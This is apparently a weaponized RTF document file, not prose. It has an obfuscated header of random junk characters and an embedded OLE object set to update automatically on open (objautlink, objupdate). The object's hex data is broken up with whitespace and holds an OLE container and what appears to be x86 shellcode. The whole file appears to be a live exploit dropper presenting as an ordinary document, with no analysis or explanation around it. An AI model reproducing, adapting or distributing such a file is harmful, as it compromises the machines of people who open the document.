{\rtf9['%)_7°[2%>°60'?'9[&!~+@!/.$%9%]?_µ202#<§79_:+#?+_[],01?µ_6?§§4>1~^%°6:;(7~*%2&9(.?=3?-°|*7*~?'&],>'`~:?8=9%>0>;6?5§(+]~?-µ'µ8??_%96;')+/5?(6&@?8?<7,,'3:?@7=*?§?6+2-/?2^§84µ?2[+(`6?.^0~%|>'%5__?µ|;/(/@+§?,',0%1>;+98|?86)1'%.<])`(;5*#|#(==]^?^)]???_!!:|2<>&~;.?7§[[)8??>%:87§?!|)-<?+§:`%'=%[%`[[6?%µ4§#%=3?%_?=?>;.|2§!<#?8@°@&%µ°7&$9<*`&8.8?*%?0%8%%%#?§)@%@>|'4+|:](7/.-]~`§?-~0?§§+|*;@?>??3?0^-<?`?9%?^]<;3]1µ]5$))*µ??^],µ%,##°!]1µ?23,%,(6#_6%%&+!.>*§(/*0>?+9?@7?]:`°6[-??.?4[?<&54[??,°^^5(?03?*>-42@`3#]')-0@@:;-*[>?59:.]%_8~+]@$?#°?°?;&|4[++`_+-`µ6@%&9=5?%!?/0-3)$->?%?303`[°:5%.]_>`7|=;9:;0=0>|/88?:4]???65.(#6960?5_[&5,?µ`$$§0,1<|72$§*&=?>%-2.)9:2%_!1|;:<8?8??86'~2$][6%)2@~=_°)+?/;:>@=,/#_%0%?9#µ|?:><=][>8§@60;:/7`??3968#!?]&[?@%^$4`]1]9°°9-?$'µ73_*7?|`[~?2~!=<?41.)°§1%%@/=)<8=21[µ=^]8+°]??|3&+9%2?^^`]§>?9(4~%,_??§µ5^%^8!8],0>_?^>9=%@§2~%@~]0;/0/0&?*5$?6'?5$#!6!61<>%=746$/(,~=-<@&,65?/?8?48)6?>$??§[):$!|~?&>[/!58%&)^2:?9=?|°20_&:7<<`&7?`?8]!=57§.5??)'?=+&§'#.`<@|?^'/).??.=$@[6/$)=°4*^_.@°_%,|^]?^;@0+#µ,+,0'#~$3#@?)%$26@(6?-)??^`~:%'?[?&+]#^8?/1$?+[`µ18>?<µ4900-<]]%,*!@|<7!?1%4(6???~1!0,µ_#3~2|^§??/|?;[`21:4),?&^4?.#*=-!3/9&1?µ?6!%==[3??,(7!'|='>?>^+@95?^4,&/;>+%6>)4)49?|-§*_|]?0'~*_.&)?=3°&),&_$0~µ?<2&.§?:?,??<#|]<=`/5|,90-~~'0_+431<#-*`?4&/;?6%??<58?1[.?)6).?2,&.6?%@|°1@4_&?(8`&0%]?=%5>.?`9?µ+-[?7|'6?~0_=9µ)@0?(~[&?#@&?=1%;67?/^+.%^1?!&.11&;[2*#5@)§`5?+$°+&]+~2?[;:§1$2^3?/~*#*%~µ[?`0°2??.?<9)26.<;@'=2/?5&[;6$?,@%?µ@1%µ@@!%>§*5_>8°>#^[&?4='92,:1%µ8&^?_:'µ?39%+°1?*1'~§@$&)>:*?;4>0µ:#µ#.43)&(`%?%9<?4?:#:20°7*7?82?§5)_].9%00_7µ[,0$?|)%=?°7-['|*+[<^<-%6?~;?6_:3>[9~~-&3948?+µ]4%!`09'|^]-,>`,~/;]`.&8+,?$]5#$_#|§]8''??)23[0,8?'@4]-?;`?4462=#@`%;6?^@|%%8~|3.:^0+!.1,#!<[>;.!'#)-~-8`[/2/[7[_70*,]>6&:`,^°!'-3!'*57[>!%;??[?]+4_%|0,&(@'?%#=+;%_^)=./>^'&$9!$^8>'*@,§§,.°%6%8*/_@#5:?];#1]#?$*72,<#/:)$>*8@$0?-??;?'5?_^+>'°%8=)(~?&3><?@?3!°9,§[%#0?7(%`;°~?.-1@295<??~°>?3=0_?%^?°|5&?[??557||5?0µ'5.0~.!$°4µ]-!%9°1??&)=/~64)2:!]+_2^_<@)|*#=*~`?`*!2+|-/`6+6|[?µ)_5?@[!0+_;/@*°/`)@{\object\objautlink\objupdate\objw7150\objh7771{\*\objdata c69c6c250200
00000200
00004f0
0	00000	000
0	00	00	0	00
00	1	0
000	0	d0
c
f	11e0a1	b11ae	1
00000
0 00
0 0	00	0	000
0000	00
0000	0000003	e
0
0	0
300feff0	9 000 600	00	000 00	00000	0 0000 000010
000 0	0	01 00000000 00000 0 00 1
0 0	000
0
2
00	00
0001000	000feffffff00000 00 0	00	0
0 0
000ffff
f
fff	ff	f
ff	f	ffff	f
f
f
f	f	f ff
f ff
f fff fff ffff
f fffffff fff	f	fffff	fff f	ff	f f
f ff f
f fff fff fffffffff	f	ffff
f	ff f
f
f
f
f f f f ff
ff
ffff
ff	fff	f	fff f	f	ff
f	f fff
fff ff ffff ff	ffff	fff ff fff	ff fff f	fffffff	f	fffff	f	f
ffffff
fffffff
ffffff
f
f
ff	ffff	ffff	fff
fff	ff f
f
fff
fffff	ff	f ffff
ff
f
ffff fff	fff
f f fff ff
ff
fff f ff fffff fffff f ff fff	f ffff	f	f	ffff	f ff	ff	fff f fff ffff
f f f
f fff
ffffff
f f
ffffff
f f
f
f ff fff fffff
f ffffff ff
f
f
fff	fff	f	f ff	fff	fffff	ff	f ff fffff
f f f
ffff ff
f
f
f fff	ff
f	f
ff
ff ff
f	f
fff
fff	ff
f	f
fffff	ffffff
ff	ff ffff f
ffffff	fff	f	f	f	fff	f	fff	ffffff
fff f
fff
ff
ff
ff	fffff	ffff	ff	fffff	f	ff
f	ff	f
f
f	f
f
ffff f f	ffff	ffffffff
fff f f fff fff fff
fffff	f
f f f	ff
f
f
f
ff
f ff fff
ff
f	ff	ff	fff f
ff ff fffff f f
ff
ff
fffff
fffffff fffff fff
ff
fff
fff
ffff ff	ffff
fff
ff	f	ffff
fffffffffffff
f	fffff	fffff	fff	fffff f	f	fff	f	ff	f	f f fffff	ff
ffff	f
f	ff
f	ffff
f	f	ffff ff ff	f	ff fff	fffffffff	ff	ff	ff	f	f	ff
f	f fffffffffffff f fffff
ff f f
f
fff ffffffff
ff
f
fff f fffffffff ff	fff
fffff
ffff
f
ff	ff
ff	f
fff f
f f fff ff	ffff fff
ffff
f
f
ff f
f	fffff
ff
fff
ffff	f
ff
fff
ff
fff
fff
fff	f	ffffffffffd	f
ffff	ff e ff
ff
fffe fffff
f	0 4 0
0000
0
0500 00000 6	0000 00feff	ff
fffffffffff
ffffff	ff	f	f	ff
fff	fffff fffffffffff fffff
ff ffff
f
ff
fffff
f ffff
f fffffffff
fffff f fffff fffffff f	f f ff fffff	f	f	fffffffff	fffff fffff ffff
ff
f ff ff
ff
f f
f ffff
f f ff f f
fff
fffff	ff
ff	f
f	fffff	fffffff	fff	fffff	ff	f	f	ff
ffffff	fff
ff	f
ff	f	fffff	fffff	fff	fffffff ff
f f ff
f ff ff
fffffffffff	f f	fff	fffffffff
fff	ffff ff f f fff fffff ff f ff	fffff	fffffffff fffffff f f	f	fffffff	f	ffff fff	ff	fff	fff	ff	fffff	f
f
f	ffff	ffffffff	f ffff fffff ff ff fffff	f	ff ff f fffff
f
fffffff	f
fffffff
f
f ffffff ff	ff
f	f
fff f	ff
ffffff	ff
ff
f
f	f
fffffff
ff f
ffff fff
ffffff ffff
f f fff
ff
fff
f f	f	ff
ffff
f ffff fffff f
fff	f	fff
f	fff
ff	fff
f	fff	f	f
f	ffff
f
fff
f
ff	ff	f f
ff	fff	fff	f
f
f	ffffffff	f	f	fff ff f ffffffff ff fff
f
fff ffff
f
fff
f	f
fff	ff	fff	fffffffffff	fff	f	ffff	fff
fffff	ff
f	f
ff
f
fff	fff
fff f	f
fff
ff	f
ffffff	fffffffff	f	fff
ff	ff	f ff
f
f
f ff	f
fffff
f	f	fffff fffff fffffff f ff ffffffff ff f f ff fffffffff ff f f
f
ff fffff f
ffffffffff f
ff
ff
ff
f
ffffffff	ffff
ff
fff	ffff	ff	ff
ff	ff
ffff
f	ff
f
f
f	fffff	f	ffff ff f
f	f	fffffff ff
f
ffff ff ff
f
f	f	f
f	ff	f
fffffff	fffff	ff	f	fff fffff
ffff ff f
f ff f ff ffffffffffff f fffff
f f
f
ffff f	ffff	f	fff	fffffff	fffffffffff f
ffff ff fff f	fff	f ffffffffffffff
ff f f
f	ff	ff
fffff	ff	ff520
06	f	00
6f0 0
74002 00 045 0	0 6e 00	7400720079
0
00
0	0
00	00
0	0	0000000 0	0	000000	000 000	0	00000000000
000	0
000
000	0000	00	0	00000000	000000	0000 0 00000000
001 600050 0ff fff f	ff	f	fffff f	f0 100000002 c e02000
0
000000	c00 0000 00000
0 0460000000 0 000000 0
0000	000 0000e
0c9
e261 22	d	4
01030000	000	00700
0000000	0000100	4f 00 6c0065003 1
00 30004e0
0	6100	7400
6	90	0760
0	6 50000 0000000 0000
0
000000
0
0000 0 00	0	00000	00 00000 00 000000000 0
000 0 00 00 00
0
00
000000 0
0 00 0
0001a00020 1f	fff fff
f f
ff ffffffff	fff	ff 0	0 0000000 000000000000	000000 00000
000 00 0000000000000	00000
0
0000
000	0000	0
0
0
0000	00	0	0 00 d c06 0
0
000
0000 00
0 0 0000 00	00	0000000	00
0
0	0
000	000
0	0
0
0000	00
00000
0
0000
0	00	00	0	00
0
0	00
00	0000	00
0	0000
00
0	00	0	00	00
0	00	000000
00000 0	0
0
00	0
0
0	00 00 00	0
0
0	00
00 0 000 00000 0000 000 0
00	0	fff
ff	ff
fffff	f	f
fff ff f
f
ff
f00
0 000 000	00	0
00000	0000	000	0 000 0000	0 000 00	0
00000 0000000 00000000
00 0
0	000
0000
0000
00
0	0	0
0	00	00000 000
0000000 0 0000	0000	00
0000	0
0000000
00 000 0	0	0
0	00
0
00000
00	0 00000 0
000 0 00000000000 0 0 0
00000000 00000 00	00000
0
000	00
0
0	00
00000
000	00	00	0	0	00	00 000 0
0	0	000
0 0
000
00000 0ff ff
f
f
f
fffff f	ff
fff
f	ff	f
f f 000
0
00 00
0
0000
000 0
0000
00000000 0 00000	0000	00	00	0 00000 0 00	0	000 000 0 000 000 0	0
0000	00	0	00
0 0000 0 00 00 0 00
0
000	0	0
010	000	0
0020	00
000	03
00	00 000
40000	0	005000 0000600000 00 7 000 0 000
8
00
0
00009 00 00000a00	000 00b0000000 c	000	0000d0000000e000 00	0
0
f00000	01000 0
0
0 0
1
1 00
0
00 01	200000 0130 0 0000
1 400
000 015 0 0 0000	1 6000000
17000000 180	000001	90 0	0000	1a000 0001b00000 0
f
e ff
ff ffff
ffffff fffff ffff fffff	f fff	fff
ff
f	f
f f
ffffffffffff f	fffffff	ffff	ff	ffffff	fff	fffff fff f f
ff ff
f ff ff ff f f ff
f ff	fff
ffffffff	ff	ff	ffff	ffffffff
f	ff	f	ff	f
ff
f ff f	ff	ffffff
f f
ff ffff ff
fffff ff ff
ff ffff	fff
f
f	fffff	fffffff	ffff	ff ffffffff f	ff ffffff f	f
ffffff f fff ff f
ff
f
f
f
ffff
fffff	ff f fff	ffff	f	ffffffff
fff	ff
f
ffff	fffffff	ff
fff	f
ffffff	f	fffffffffff
ff	fffff fff
ffffffffff fffffffffffff fffffff fff	fffffffffff
f ffff	fffff
f
ffffff	ff
f	fff	f ffff	ff	ffff	f	ff	fffff	f
ff
f fffff
ffff fffffffffff f	fff
f
ffff
ffff
ff
f	f	f ffff
ff
f
ff	fffffff
f
f
ffff
ffff ff f	ff
f	f
f	f
fff	ffff	fff	fffff	ff	ffffff fffffffff ffffffffff
f
fff
f ff
f
ff fff f
fff
f ff	ffff	f
ffffffff	ff	ffffffff	ffffffff	fff	f	f	f	f
f	f
f fff f ffffff
f ff
fff f
f ffff	ffffff	f	f	ffff	f	f	fff	ff
ff	ff fffff
f	fff
f	f
ff ffffffff
fffff f
f
f	fff	f	ff	f	f
f
ffffff	f	f
fff	f
f
ffff	f
f
ffff fffff f fff f f	fffffff
ffffff
f
f fff	ff
ff	ffff
f
fff
ff	fffff	ffffff	ff	ff f	fff fff ff ffff f ffff
fff	f f
f ff ffff fffff	f	ff	f	ff ff ffff
ffff fffff f fffd806000002 e801b7990a0108b a1 eb8 f1f88
3
a6
2 db5 3 b3 e
a6
8
b
108
b2ab 94f98b9fff7d18b
1 1 5	5
ffd2
051
2fb55	0	e059005	aaf1 f f	e0a 13 0e 9c5 872 7f2
cf44
0 0 3
6	a
36e6ab 88c 84d f2f 72
edcc738 3c2
f80
ad1c
1c
9a9
bd
cd69
8b54a
3cc
2
550d	1a9f
13a8	9	d2715eadd4	8	5
6747dcbca1b8e	e	cd	7	c	dd1dc	ac60	510496d4	27	c8	49437c4	b f	4d3bf57 c 6
7 f45	5 1 a71e 23a 23
81
db d44 d6 11 0 2
d
6
b9 a 7 e7a5
79af
61 f1
d d3	1 2
d 25 52 8 47 6 da1
e
e	03bc
e92	10	100	0
0ad
18	01 bf
2 496 2	e	2 5f4 3 d
3 71 65bb9	35	4e5	da	5a49e0	1d3a427	8e8a 3 a
a2d7c08 e
99
686	2	2c	ac	d
e
9
6 46
cf0	ee	ced86	5ab15b31e1202 c3dcba a	a16
c	8
236d
e	16
f
4
5	c2	967	d5aa3
29	ed8e	1	474	efa3	7	9d9db	89	4	8 a 89	56d5cf2016	0d c7
c587bf ba6
e b	4270eea
72	70	90139	5f bb22 038 9fc5d	8f
9	e
5
4 3d 63a4a09c9 637 e96
b21da64f2	c	959fb ba 0 c132c88e 92
6
204c a
4 7	a5e7b
9	9b230	6	9912 f
9 5
cb6 327b8	db7c
36	a1ccf1
7
43b 10d
3 f715	8
8e	509
6
c
2c8a6c	88	2be1	cc
f
4f4f586849	6	800852e4e
f	c8ca3d	7ba9	570
ae7	0ad
c2	9
3	4	f
17679ad5
8
6
156	9
00
67 a37b91134
f6	1501	d
f	9f c
448 a 6 4c 4 ff 127 8 05d 0668 41e 106575c 25664 2 138	c46b81
9d3
a7ae
f	1 e
a0c06b3d1ee4d
d 1
76	33 f 4a
9	1	e	21d1fad
1
0	0
0	6
c
be a
adc26	a	deb5d6
53
3	d51 f a6 1e72f10795 081 b8e4c69 96	65 d225 56
e
9	7701 0 0009
c535	0
53
0 5
a a4 30 0	000
53c540
00081e	bc
20	e	00	0
0
5
b
9c57565 381c7ae1500008	db67a3c00
0
0
8	d 9b04	65	00 0081c7eb
0a
0	000	81	eb2	0	4
c	00	008d
be9	e78	0000
5 b
5
e5f 9d 585 b9deb
05e
9 d70000	0	05eeb48eb0	7e	9e90	00000	e
b4
4	e
8	9d
010	00	0e	b	365	89c5681c6463f	00008	1e
e134c0000
8 1	c6437500
00
5e9d5	feb1
5e	b	07e	bcfe9d	0	0	0000005b514e f3c3106 e9d30 00000 e9e9	0000	0
0
e
be	de bc 8 8 3c64cebb5e9d 7000
0
00 9 c57	565	78	1 e fd
a	3	7	0
00081c7 ce
7f0 00	05f5 e
5	f5	7
5	f9deb6 a 9c	5	3	57538d	b	fe2	50	000081c	70	23
b
0	00
08	1 eb	ef 0 d0 0
0 0 908 dbb3 2 3 c0000	5b5f5
b	9d	e 9860
000009 c 5381c
3c 60f
0	000eb06	62f7 6378a69
f8 d9 b	ac34
0 0008d
9	b09 5e	00008
1e
b	8 5110	0
0	0
5b9d	eb 2	8 9
c 56
8
1 ee2 91 d000
08
1e e224d0
00 0 8	db6	277
d0000
5
e	9d	8d8f77f
c	ffffe b2
f
6
9c0
8
70c3a7 a e
b3aeb	46
e8	1a
ffff	f	f	e	9 0e	ff ffffe b 0622 7b
d4	e
0f c4b8d b
e8 9	0 30	00	06b
c000
e	9
6
aff fff f e929ffffff	e	9	01	f	fffff	e 90 3f	f	fff	fe	91 8	ff	f ff fe b 07e	b17 e9
18f
fff	f	f83 c6 0439	fe72b
2	eba8e9d	4feffff5	7 5 0e b 87 5e
c
3dd1	49 b3c
5c7c
8d 86f
7 6d52 7ff f9
7
c5
eb0ae3df1497ba7dc	0184d	c1	da8ec	d1c3272049ea	5bc	3 75 ed8	4 0d f 66fe 1c e 1c74 f b 136 84 83eb32c9 a 1 a4e24 5 4e	6e136cc	c	0d3	b	7a1
f 6	8e
b	9
75
7	c	c18a	e c 45ca3176b 76	d21	2	7e6aa2 2 9396 d4	0b	7b	ca	fd0ee389	cba3	3 1 a
4d976 b09b1 19	2bd	cd1	dc25	74	e0
b5b
d
d	9bd09 0068f 8 65a21 fd58f0dded	9	ca	9	a
29a	8b3	b	7
258d6ae	44cd	9
3
3f31	11a1 f685dd7e0b5f000 ad	7f5 ab50
c2 d bb 6a
c347e 549d619ef2 8cc
17e
70f4 8 4c3bad 9 6f	37 a18
48 16ffd 0	b	4d	8f13	f269d a1a5 0056ace8691 4818 6
43b8 94	6fa6c1	1	7a15c 4b35 b81	00ade 7b
0
e
3 b	c
59
d88 b 962 248 c23
b	9 5 e
9d
e80
c6 de f bbb4	c	88e	2 d 7 b
5 7e
c	85	e
a a5a7 b 0
e5cd40570 cfd72 98b
f c4
6bd 9d7a3 f 4be523227f5
d2d4
54 bc5c
0f 5eca8 1750 2375c8
227e 51 51	5	ea
a
7
bf	e a
f 5f25
21 8
7
f9a b cd	075a51	501 0a
0
9 2e1	39b7
9e	b98a7	30e 5d d	a d
7e1
3b c
d e5
7
762
77c64
0	9 fd9
0bab772 5 1 6
6e b	7	a	9
0	9e1 0ae40167 bc70 05 7 f	a391	84	b 878a 9cd671292b9a865 a	2b	3 a7060 8c780	e4f 7 6526dd60fd6	01d8d
90
6
c
0	1455
cd6
3
0
b
86	ce9 33
5dd
93f 0
a
4	b
4
ae4
e	c65c2
7
486	0049c2	0 b4 b 343d8	784 66333 8 93	3 5 0	8	f3 8 5 b523 591 2ca
f
1 da	dc	0e 7 f4fa 94 b
23
37	b
a6	42c	5010d	8d2	31
85 f53 7ad6
9b 16 1
99	8c6bbf ac	5	03	4	a019c
da6	18c	06	34 17 22 19 897b17 d0 06068 1f19f79 0
6
6
ccf
a
d cc155
931f87ee	bc	7
035 1b9 9 0
796cc9b fe 12c6b 376319c3 828 9d 3
719c
d4 c	df
d7 d7
6c3 1 e748
45e0ad
eb0abb2e1
6
8
9
3 1
9d18 412797
8ffe	c3
cba3	b
b
5
7c 47 8 171
0 5e 7
b	b	c6
e2d3c	92c5 c 7d97b	c981
4e9d55462	511
6	b 8d 3 1d
b3a0
82
0
1
602d
331
1bbfb0 ed2 372 0 c3
3
b8	5
d
1ce21
6 a9
1	db
4	6	8f05239ad	0961	0	1
fe4ca	fc36
3a 3a9e25d69 4b6
1
1e1302	5
21d	d
f	008
f	3
e	d92e
9
3a
b
a
3 d641
df5 c	a1e378	52ba	8e3d 8 43f20b1e3 b f
7a0d
d2
8cadf	353 82
bcb614048 f 38a 3027	a e936
c	e	db	1
ed5f6 c
f9
7	79 4559d fcb
8 a0 8
2c 6b
1 0e
9fe1 c0	efb8485 0cf6e77910f5a39d3db6f5dcad	22018f	be
e a5 36 9
e 4f4	5	b	2	f	388	e	8909eca
9
bdb6	3f0	e	623a 4d
4 3c fc33d4e2a5 0511bdb5cae 2
3cbd9	bf	4f
8017	52 4	2837c	c0 1 39f
12e
212	9
6d4
a9b8 5 30c d c 3e 26
0fd f e4 33 7f
1
c 66 f7
91 35c b7 73a756 3ab2 254	b
9b2
8
7
3 0306a1c3 9
4a4d0
d5
4 b
6c65548 32 ef8147 f 4 409	bea07ac3d	1d	94 f 15c7a
b 74 c 86
e4b
3f2 d	b
565dc340	7	6d	4ba	90	84070
cc664ab9b1267c205	93	a1a
ed 75cc48ed 2 d1	a1abde3b	d7 03
f6
60 3
0 b 7
d4b	a
eeb3d4cea
c ba
4
5 4 0 f0f6 cb737 5cc bdd	0	b6829084	eca4	a8	3
d	f2	387
d 3 e
321
f291	6
65
1c e d8 6
09b1f f 9 23 73 3	0
e1df11bc78 e6a34d c 17337	64	2 8248fd05
0
0
0
0	0 0	0000 0 00
00000 000
0 0000	0 000
000 0 0000
0
000
00 000000	000000000	000	0	0
00	00000
0 0 0
0	00	000
00 0
0
0 00 0 0 0000	000	0
0
0
0	00000	0
0
000 0000
00000 00	00	00 0 0	000
000	000000000	00 00000 0000
00
00000
00
00000 0 0000000 0 0	00	000000 0 000 0 000000 0000000000
0 00000
0
00
00
00
0
00 0
00
0000 0 00000 000
00
0
00 00 00 00 000 0	0000000000000	0000 0000	0	00 0 0 000000 000 00000
0	0	00 000 00	0	0	0	0000000000	00000
0
0 0
0	00
00000	0
000
0
000
00
00
000 0000000 0000 00000000	0000 000 0
0
00 0
00000000000
0 0 0
0
0000
0
00	00	0 0 0
00 0 0 00
00 0 00	0
0
0	0 0
000000 000000 00 00
0 0
00000
00 000
0
00
0 00	0	00	0000
0	0 00000
0 0 000
00000 00	00
00	000 00000	0000	00
00000
00
0 0
0 00 0 0000000
0 0
0
00
00
00 00 00 00
000000
000 00000 00000000
0 0
0
0 00	0
0	0
0
000
0 0	0	00	0	00	000	0 00 0 00 d
2	1eed3	80000	000 0}}}